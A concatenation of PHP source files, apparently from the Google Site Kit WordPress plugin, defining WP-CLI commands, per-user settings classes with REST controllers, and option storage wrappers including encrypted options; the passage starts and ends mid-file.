@param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Registers WP CLI commands. * * @since 1.11.0 */ public function register() { WP_CLI::add_command( 'google-site-kit auth', new Authentication_CLI_Command( $this->context ) ); WP_CLI::add_command( 'google-site-kit reset', new Reset_CLI_Command( $this->context ) ); } } <?php /** * Site Kit Authentication CLI Commands * * @package Google\Site_Kit\Core\CLI * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\CLI; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Storage\Transients; use Google\Site_Kit\Core\Authentication\Authentication; use WP_CLI; /** * Manages Site Kit user authentication for Google APIs. * * @since 1.11.0 * @access private * @ignore */ class Authentication_CLI_Command extends CLI_Command { /** * Disconnects a user from Site Kit, removing their relevant user options and revoking their token. * * ## OPTIONS * * --id=<id> * : User ID to disconnect. * * ## EXAMPLES * * wp google-site-kit auth disconnect --id=11 * * @alias revoke * * @since 1.11.0 * * @param array $args Array of arguments. * @param array $assoc_args Array of associated arguments. */ public function disconnect( $args, $assoc_args ) { $user_id = absint( $assoc_args['id'] ); $authentication = new Authentication( $this->context, new Options( $this->context ), new User_Options( $this->context, $user_id ), new Transients( $this->context ) ); $authentication->disconnect(); WP_CLI::success( sprintf( 'User with ID %d successfully disconnected.', $user_id ) ); } } <?php /** * Class Google\Site_Kit\Core\User\Email_Reporting * * @package Google\Site_Kit\Core\User * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling email reporting settings rest routes. * * @since 1.162.0 * @access private * @ignore */ class Email_Reporting { /** * Email_Reporting_Settings instance. * * @since 1.162.0 * @var Email_Reporting_Settings */ private $email_reporting_settings; /** * REST_Email_Reporting_Controller instance. * * @since 1.162.0 * @var REST_Email_Reporting_Controller */ private $rest_controller; /** * Constructor. * * @since 1.162.0 * * @param User_Options $user_options User_Options instance. */ public function __construct( User_Options $user_options ) { $this->email_reporting_settings = new Email_Reporting_Settings( $user_options ); $this->rest_controller = new REST_Email_Reporting_Controller( $this->email_reporting_settings ); } /** * Registers functionality through WordPress hooks. * * @since 1.162.0 */ public function register() { $this->email_reporting_settings->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\User\REST_Audience_Settings_Controller * * @package Google\Site_Kit\Core\User * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use Google\Site_Kit\Core\Util\Feature_Flags; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling audience settings rest routes. * * @since 1.134.0 * @access private * @ignore */ class REST_Audience_Settings_Controller { /** * Audience_Settings instance. * * @since 1.134.0 * @var Audience_Settings */ private $audience_settings; /** * Constructor. * * @since 1.134.0 * * @param Audience_Settings $audience_settings Audience_Settings instance. */ public function __construct( Audience_Settings $audience_settings ) { $this->audience_settings = $audience_settings; } /** * Registers functionality through WordPress hooks. * * @since 1.134.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/audience-settings', ) ); } ); } /** * Gets REST route instances. * * @since 1.134.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_view_dashboard = function () { return current_user_can( Permissions::VIEW_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/audience-settings', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->audience_settings->get() ); }, 'permission_callback' => $can_view_dashboard, ), array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function ( WP_REST_Request $request ) { $settings = $request['data']['settings']; $this->audience_settings->merge( $settings ); return new WP_REST_Response( $this->audience_settings->get() ); }, 'permission_callback' => $can_view_dashboard, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'minProperties' => 1, 'additionalProperties' => false, 'properties' => array( 'configuredAudiences' => array( 'type' => 'array', 'items' => array( 'type' => 'string', ), ), 'isAudienceSegmentationWidgetHidden' => array( 'type' => 'boolean', ), 'didSetAudiences' => array( 'type' => 'boolean', ), ), ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\User\REST_Initial_Setup_Controller * * @package Google\Site_Kit\Core\User * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling audience settings rest routes. * * @since 1.164.0 * @access private * @ignore */ class REST_Initial_Setup_Controller { /** * Initial_Setup_Settings instance. * * @since 1.164.0 * @var Initial_Setup_Settings */ private $initial_setup_settings; /** * Constructor. * * @since 1.164.0 * * @param Initial_Setup_Settings $initial_setup_settings Initial_Setup_Settings instance. */ public function __construct( Initial_Setup_Settings $initial_setup_settings ) { $this->initial_setup_settings = $initial_setup_settings; } /** * Registers functionality through WordPress hooks. * * @since 1.164.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/initial-setup-settings', ) ); } ); } /** * Gets REST route instances. * * @since 1.164.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_setup = function () { return current_user_can( Permissions::SETUP ); }; return array( new REST_Route( 'core/user/data/initial-setup-settings', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->initial_setup_settings->get() ); }, 'permission_callback' => $can_setup, ), array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function ( WP_REST_Request $request ) { $settings = $request['data']['settings']; $this->initial_setup_settings->merge( $settings ); return new WP_REST_Response( $this->initial_setup_settings->get() ); }, 'permission_callback' => $can_setup, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'minProperties' => 1, 'additionalProperties' => false, 'properties' => array( 'isAnalyticsSetupComplete' => array( 'type' => 'boolean', ), ), ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\User\User * * @package Google\Site_Kit\Core\User * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Util\Feature_Flags; /** * Class for handling user settings rest routes. * * @since 1.134.0 * @access private * @ignore */ class User { /** * Audience_Segmentation instance. * * @since 1.134.0 * @var Audience_Segmentation */ private $audience_segmentation; /** * Conversion_Reporting instance. * * @since 1.144.0 * @var Conversion_Reporting */ private $conversion_reporting; /** * Email_Reporting instance. * * @since 1.162.0 * @var Email_Reporting */ private $email_reporting; /** * Initial_Setup instance. * * @since 1.164.0 * @var Initial_Setup */ private $initial_setup; /** * Constructor. * * @since 1.134.0 * @since 1.162.0 Added Email Reporting. * @since 1.164.0 Added Initial Setup. * * @param User_Options $user_options User_Options instance. */ public function __construct( User_Options $user_options ) { $this->audience_segmentation = new Audience_Segmentation( $user_options ); $this->conversion_reporting = new Conversion_Reporting( $user_options ); if ( Feature_Flags::enabled( 'proactiveUserEngagement' ) ) { $this->email_reporting = new Email_Reporting( $user_options ); } if ( Feature_Flags::enabled( 'setupFlowRefresh' ) ) { $this->initial_setup = new Initial_Setup( $user_options ); } } /** * Registers functionality through WordPress hooks. * * @since 1.134.0 * @since 1.162.0 Added Email Reporting. * @since 1.164.0 Added Initial Setup. */ public function register() { $this->audience_segmentation->register(); $this->conversion_reporting->register(); if ( Feature_Flags::enabled( 'proactiveUserEngagement' ) && $this->email_reporting ) { $this->email_reporting->register(); } if ( Feature_Flags::enabled( 'setupFlowRefresh' ) ) { $this->initial_setup->register(); } } } <?php /** * Class Google\Site_Kit\Core\User\Conversion_Reporting_Settings * * @package Google\Site_Kit\Core\Conversion_Reporting * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for handling conversion reporting settings rest routes. * * @since 1.144.0 * @access private * @ignore */ class Conversion_Reporting_Settings extends User_Setting { /** * The user option name for this setting. */ const OPTION = 'googlesitekit_conversion_reporting_settings'; /** * Gets the expected value type. * * @since 1.144.0 * * @return string The type name. */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.144.0 * * @return array The default value. */ protected function get_default() { return array( 'newEventsCalloutDismissedAt' => 0, 'lostEventsCalloutDismissedAt' => 0, ); } /** * Merges an array of settings to update. * * @since 1.144.0 * * @param array $partial Partial settings array to save. * @return bool True on success, false on failure. */ public function merge( array $partial ) { $settings = $this->get(); $partial = array_filter( $partial, function ( $value ) { return null !== $value; } ); $allowed_settings = array( 'newEventsCalloutDismissedAt' => true, 'lostEventsCalloutDismissedAt' => true, ); $updated = array_intersect_key( $partial, $allowed_settings ); return $this->set( array_merge( $settings, $updated ) ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.144.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $settings ) { if ( ! is_array( $settings ) ) { return array(); } if ( isset( $settings['newEventsCalloutDismissedAt'] ) ) { if ( ! is_int( $settings['newEventsCalloutDismissedAt'] ) ) { $settings['newEventsCalloutDismissedAt'] = 0; } } if ( isset( $settings['lostEventsCalloutDismissedAt'] ) ) { if ( ! is_int( $settings['lostEventsCalloutDismissedAt'] ) ) { $settings['lostEventsCalloutDismissedAt'] = 0; } } return $settings; }; } } <?php /** * Class Google\Site_Kit\Core\User\REST_Email_Reporting_Controller * * @package Google\Site_Kit\Core\User * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling email reporting user settings via REST API. * * @since 1.162.0 * @access private * @ignore */ class REST_Email_Reporting_Controller { /** * Email_Reporting_Settings instance. * * @since 1.162.0 * @var Email_Reporting_Settings */ private $settings; /** * Constructor. * * @since 1.162.0 * * @param Email_Reporting_Settings $settings Email_Reporting_Settings instance. */ public function __construct( Email_Reporting_Settings $settings ) { $this->settings = $settings; } /** * Registers functionality through WordPress hooks. * * @since 1.162.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/email-reporting-settings', ) ); } ); } /** * Gets REST route instances. * * @since 1.162.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_view_dashboard = function () { return current_user_can( Permissions::VIEW_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/email-reporting-settings', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->settings->get() ); }, 'permission_callback' => $can_view_dashboard, ), array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function ( WP_REST_Request $request ) { $settings = $request['data']['settings']; $this->settings->merge( $settings ); return new WP_REST_Response( $this->settings->get() ); }, 'permission_callback' => $can_view_dashboard, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'minProperties' => 1, 'additionalProperties' => false, 'properties' => array( 'frequency' => array( 'type' => 'string', 'enum' => array( Email_Reporting_Settings::FREQUENCY_WEEKLY, Email_Reporting_Settings::FREQUENCY_MONTHLY, Email_Reporting_Settings::FREQUENCY_QUARTERLY, ), ), 'subscribed' => array( 'type' => 'boolean', ), ), ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\User\Audience_Settings * * @package Google\Site_Kit\Core\User * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Setting; use Google\Site_Kit\Core\Util\Sanitize; /** * Class for audience settings. * * @since 1.134.0 * @access private * @ignore */ class Audience_Settings extends User_Setting { /** * The user option name for audience setting. */ const OPTION = 'googlesitekit_audience_settings'; /** * Gets the expected value type. * * @since 1.124.0 * * @return string The type name. */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.124.0 * @since 1.136.0 Added `didSetAudiences` default value. * * @return array The default value. */ protected function get_default() { return array( 'configuredAudiences' => null, 'isAudienceSegmentationWidgetHidden' => false, 'didSetAudiences' => false, ); } /** * Merges an array of settings to update. * * @since 1.124.0 * @since 1.138.0 Allow setting `null` for `configuredAudiences`. * * @param array $partial Partial settings array to save. * @return bool True on success, false on failure. */ public function merge( array $partial ) { $settings = $this->get(); $partial = array_filter( $partial, function ( $value, $key ) { // Allow setting `null` for `configuredAudiences`. return 'configuredAudiences' === $key ? true : null !== $value; }, ARRAY_FILTER_USE_BOTH ); $allowed_settings = array( 'configuredAudiences' => true, 'isAudienceSegmentationWidgetHidden' => true, 'didSetAudiences' => true, ); $updated = array_intersect_key( $partial, $allowed_settings ); if ( empty( $settings['didSetAudiences'] ) && isset( $updated['configuredAudiences'] ) && is_array( $updated['configuredAudiences'] ) && ! empty( $updated['configuredAudiences'] ) ) { $updated['didSetAudiences'] = true; } return $this->set( array_merge( $settings, $updated ) ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.124.0 * @since 1.138.0 Allow setting `null` for `configuredAudiences`. * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $settings ) { if ( ! is_array( $settings ) ) { return array(); } $sanitized_settings = array(); // Allow setting `null` for `configuredAudiences`. if ( array_key_exists( 'configuredAudiences', $settings ) ) { $sanitized_settings['configuredAudiences'] = is_null( $settings['configuredAudiences'] ) ? null : Sanitize::sanitize_string_list( $settings['configuredAudiences'] ); } if ( isset( $settings['isAudienceSegmentationWidgetHidden'] ) ) { $sanitized_settings['isAudienceSegmentationWidgetHidden'] = false !== $settings['isAudienceSegmentationWidgetHidden']; } if ( isset( $settings['didSetAudiences'] ) ) { $sanitized_settings['didSetAudiences'] = false !== $settings['didSetAudiences']; } return $sanitized_settings; }; } } <?php /** * Class Google\Site_Kit\Core\User\Conversion_Reporting * * @package Google\Site_Kit\Core\User * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling conversion reporting settings rest routes. * * @since 1.144.0 * @access private * @ignore */ class Conversion_Reporting { /** * Conversion_Reporting_Settings instance. * * @since 1.144.0 * @var Conversion_Reporting_Settings */ private $conversion_reporting_settings; /** * REST_Conversion_Reporting_Controller instance. * * @since 1.144.0 * @var REST_Conversion_Reporting_Controller */ private $rest_controller; /** * Constructor. * * @since 1.144.0 * * @param User_Options $user_options User_Options instance. */ public function __construct( User_Options $user_options ) { $this->conversion_reporting_settings = new Conversion_Reporting_Settings( $user_options ); $this->rest_controller = new REST_Conversion_Reporting_Controller( $this->conversion_reporting_settings ); } /** * Registers functionality through WordPress hooks. * * @since 1.144.0 */ public function register() { $this->conversion_reporting_settings->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\User\Initial_Setup_Settings * * @package Google\Site_Kit\Core\User * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for initial setup settings. * * @since 1.164.0 * @access private * @ignore */ class Initial_Setup_Settings extends User_Setting { /** * The user option name for the initial setup setting. */ const OPTION = 'googlesitekit_initial_setup'; /** * Gets the expected value type. * * @since 1.164.0 * * @return string The type name. */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.164.0 * * @return array The default value. */ protected function get_default() { return array( 'isAnalyticsSetupComplete' => null, ); } /** * Merges an array of settings to update. * * @since 1.164.0 * * @param array $partial Partial settings array to save. * @return bool True on success, false on failure. */ public function merge( array $partial ) { $settings = $this->get(); $partial = array_filter( $partial, function ( $value ) { return null !== $value; } ); $allowed_settings = array( 'isAnalyticsSetupComplete' => true, ); $updated = array_intersect_key( $partial, $allowed_settings ); return $this->set( array_merge( $settings, $updated ) ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.164.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $settings ) { if ( ! is_array( $settings ) ) { return array(); } if ( isset( $settings['isAnalyticsSetupComplete'] ) ) { $settings['isAnalyticsSetupComplete'] = (bool) $settings['isAnalyticsSetupComplete']; } return $settings; }; } } <?php /** * Class Google\Site_Kit\Core\User\Initial_Setup * * @package Google\Site_Kit\Core\User * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling initial setup rest routes. * * @since 1.164.0 * @access private * @ignore */ class Initial_Setup { /** * Initial_Setup_Settings instance. * * @since 1.164.0 * @var Initial_Setup_Settings */ private $initial_setup_settings; /** * REST_Initial_Setup_Controller instance. * * @since 1.164.0 * @var REST_Initial_Setup_Controller */ private $rest_controller; /** * Constructor. * * @since 1.164.0 * * @param User_Options $user_options User_Options instance. */ public function __construct( User_Options $user_options ) { $this->initial_setup_settings = new Initial_Setup_Settings( $user_options ); $this->rest_controller = new REST_Initial_Setup_Controller( $this->initial_setup_settings ); } /** * Registers functionality through WordPress hooks. * * @since 1.164.0 */ public function register() { $this->initial_setup_settings->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\User\Audience_Segmentation * * @package Google\Site_Kit\Core\User * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling audience settings rest routes. * * @since 1.134.0 * @access private * @ignore */ class Audience_Segmentation { /** * Audience_Settings instance. * * @since 1.134.0 * @var Audience_Settings */ private $audience_settings; /** * REST_Audience_Settings_Controller instance. * * @since 1.134.0 * @var REST_Audience_Settings_Controller */ private $rest_controller; /** * Constructor. * * @since 1.134.0 * * @param User_Options $user_options User_Options instance. */ public function __construct( User_Options $user_options ) { $this->audience_settings = new Audience_Settings( $user_options ); $this->rest_controller = new REST_Audience_Settings_Controller( $this->audience_settings ); } /** * Registers functionality through WordPress hooks. * * @since 1.134.0 */ public function register() { $this->audience_settings->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\User\Email_Reporting_Settings * * @package Google\Site_Kit\Core\User * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for email reporting settings. * * @since 1.161.0 * @access private * @ignore */ class Email_Reporting_Settings extends User_Setting { /** * The user option name for email reporting setting. */ const OPTION = 'googlesitekit_email_reporting_settings'; const FREQUENCY_WEEKLY = 'weekly'; const FREQUENCY_MONTHLY = 'monthly'; const FREQUENCY_QUARTERLY = 'quarterly'; /** * Gets the expected value type. * * @since 1.161.0 * * @return string The type name. */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.161.0 * * @return array The default value. */ protected function get_default() { return array( 'subscribed' => false, 'frequency' => self::FREQUENCY_WEEKLY, ); } /** * Merges an array of settings to update. * * @since 1.161.0 * * @param array $partial Partial settings array to save. * @return bool True on success, false on failure. */ public function merge( array $partial ) { $settings = $this->get(); $partial = array_filter( $partial, function ( $value ) { return null !== $value; } ); $allowed_settings = array( 'subscribed' => true, 'frequency' => true, ); $updated = array_intersect_key( $partial, $allowed_settings ); return $this->set( array_merge( $settings, $updated ) ); } /** * Gets the meta key used to store the setting. * * @since 1.167.0 * * @return string Meta key for the user option. */ public function get_meta_key() { return $this->user_options->get_meta_key( static::OPTION ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.161.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $settings ) { if ( ! is_array( $settings ) ) { return array(); } $sanitized_settings = array(); if ( isset( $settings['subscribed'] ) ) { $sanitized_settings['subscribed'] = (bool) $settings['subscribed']; } if ( array_key_exists( 'frequency', $settings ) ) { if ( is_string( $settings['frequency'] ) ) { $sanitized_settings['frequency'] = $settings['frequency']; } else { $sanitized_settings['frequency'] = self::FREQUENCY_WEEKLY; } if ( ! in_array( $sanitized_settings['frequency'], array( self::FREQUENCY_WEEKLY, self::FREQUENCY_MONTHLY, self::FREQUENCY_QUARTERLY ), true ) ) { $sanitized_settings['frequency'] = self::FREQUENCY_WEEKLY; } } return $sanitized_settings; }; } /** * Accessor for the `subscribed` setting. * * @since 1.161.0 * * @return bool TRUE if user is subscribed, otherwise FALSE. */ public function is_user_subscribed() { return $this->get()['subscribed']; } } <?php /** * Class Google\Site_Kit\Core\User\REST_Conversion_Reporting_Controller * * @package Google\Site_Kit\Core\User * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\User; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling conversion reporting settings rest routes. * * @since 1.144.0 * @access private * @ignore */ class REST_Conversion_Reporting_Controller { /** * Conversion_Reporting_Settings instance. * * @since 1.144.0 * @var Conversion_Reporting_Settings */ private $conversion_reporting_settings; /** * Constructor. * * @since 1.144.0 * * @param Conversion_Reporting_Settings $conversion_reporting_settings Conversion_Reporting_Settings instance. */ public function __construct( Conversion_Reporting_Settings $conversion_reporting_settings ) { $this->conversion_reporting_settings = $conversion_reporting_settings; } /** * Registers functionality through WordPress hooks. * * @since 1.144.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/conversion-reporting-settings', ) ); } ); } /** * Gets REST route instances. * * @since 1.144.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_view_dashboard = function () { return current_user_can( Permissions::VIEW_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/conversion-reporting-settings', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->conversion_reporting_settings->get() ); }, 'permission_callback' => $can_view_dashboard, ), array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function ( WP_REST_Request $request ) { $settings = $request['data']['settings']; $this->conversion_reporting_settings->merge( $settings ); return new WP_REST_Response( $this->conversion_reporting_settings->get() ); }, 'permission_callback' => $can_view_dashboard, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'minProperties' => 1, 'additionalProperties' => false, 'properties' => array( 'newEventsCalloutDismissedAt' => array( 'type' => 'integer', ), 'lostEventsCalloutDismissedAt' => array( 'type' => 'integer', ), ), ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Storage\Options * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; use Google\Site_Kit\Context; /** * Class providing access to options. * * It uses regular options or network options, depending on in which mode the plugin is running. * * @since 1.0.0 * @access private * @ignore */ final class Options implements Options_Interface { /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Checks whether or not a value is set for the given option. * * @since 1.3.0 * * @param string $option Option name. * @return bool True if value set, false otherwise. */ public function has( $option ) { // Call for option to ensure 'notoptions' cache is fresh for the option. $value = $this->get( $option ); if ( $this->context->is_network_mode() ) { $network_id = get_current_network_id(); $notoptions = wp_cache_get( "$network_id:notoptions", 'site-options' ); } else { $notoptions = wp_cache_get( 'notoptions', 'options' ); } // Check for `notoptions` cache. If unavailable, query the database. // This is particularly happening when `WP_INSTALLING` is true, // which includes `wp-activate.php` in multisite setups and certain // other multisite-related functions. // See: https://github.com/google/site-kit-wp/issues/7653. if ( false === $notoptions ) { return (bool) $value; } return ! isset( $notoptions[ $option ] ); } /** * Gets the value of the given option. * * @since 1.0.0 * * @param string $option Option name. * @return mixed Value set for the option, or false if not set. */ public function get( $option ) { if ( $this->context->is_network_mode() ) { return get_network_option( null, $option ); } return get_option( $option ); } /** * Sets the value for a option. * * @since 1.0.0 * * @param string $option Option name. * @param mixed $value Option value. Must be serializable if non-scalar. * @return bool True on success, false on failure. */ public function set( $option, $value ) { if ( $this->context->is_network_mode() ) { return update_network_option( null, $option, $value ); } return update_option( $option, $value ); } /** * Deletes the given option. * * @since 1.0.0 * * @param string $option Option name. * @return bool True on success, false on failure. */ public function delete( $option ) { if ( $this->context->is_network_mode() ) { return delete_network_option( null, $option ); } return delete_option( $option ); } } <?php /** * Interface Google\Site_Kit\Core\Storage\Options_Interface * * @package Google\Site_Kit\Core\Storage * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Interface for Options implementations. * * @since 1.2.0 * @access private * @ignore */ interface Options_Interface { /** * Checks whether or not a value is set for the given option. * * @since 1.3.0 * * @param string $option Option name. * @return bool True if value set, false otherwise. */ public function has( $option ); /** * Gets the value of the given option. * * @since 1.2.0 * * @param string $option Option name. * @return mixed Value set for the option, or false if not set. */ public function get( $option ); /** * Sets the value for a option. * * @since 1.2.0 * * @param string $option Option name. * @param mixed $value Option value. Must be serializable if non-scalar. * @return bool True on success, false on failure. */ public function set( $option, $value ); /** * Deletes the given option. * * @since 1.2.0 * * @param string $option Option name. * @return bool True on success, false on failure. */ public function delete( $option ); } <?php /** * Class Google\Site_Kit\Core\Storage\Encrypted_Options * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Class providing access to encrypted options. * * @since 1.0.0 * @access private * @ignore */ final class Encrypted_Options implements Options_Interface { /** * Data Encryption API instance. * * @since 1.0.0 * @var Data_Encryption */ private $encryption; /** * Option API instance. * * @since 1.0.0 * @var Options */ private $options; /** * Constructor. * * @since 1.0.0 * * @param Options $options Option API instance. */ public function __construct( Options $options ) { $this->encryption = new Data_Encryption(); $this->options = $options; } /** * Checks whether or not a value is set for the given option. * * @since 1.3.0 * * @param string $option Option name. * @return bool True if value set, false otherwise. */ public function has( $option ) { return $this->options->has( $option ); } /** * Gets the value of the given option. * * @since 1.0.0 * * @param string $option Option name. * @return mixed Value set for the option, or false if not set. */ public function get( $option ) { $raw_value = $this->options->get( $option ); // If there is no value stored, return the default which will not be encrypted. if ( ! $this->options->has( $option ) ) { return $raw_value; } $data = $this->encryption->decrypt( $raw_value ); return maybe_unserialize( $data ); } /** * Sets the value for a option. * * @since 1.0.0 * * @param string $option Option name. * @param mixed $value Option value. Must be serializable if non-scalar. * @return bool True on success, false on failure. */ public function set( $option, $value ) { if ( ! is_scalar( $value ) ) { $value = maybe_serialize( $value ); } $raw_value = $this->encryption->encrypt( $value ); if ( ! $raw_value ) { return false; } return $this->options->set( $option, $raw_value ); } /** * Deletes the given option. * * @since 1.0.0 * * @param string $option Option name. * @return bool True on success, false on failure. */ public function delete( $option ) { return $this->options->delete( $option ); } } <?php /** * Interface Google\Site_Kit\Core\Storage\Setting_With_ViewOnly_Keys_Interface * * @package Google\Site_Kit\Core\Storage * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Storage; /** * Interface for a settings class that includes view-only settings. * * @since 1.111.0 * @access private * @ignore */ interface Setting_With_ViewOnly_Keys_Interface { /** * Returns keys 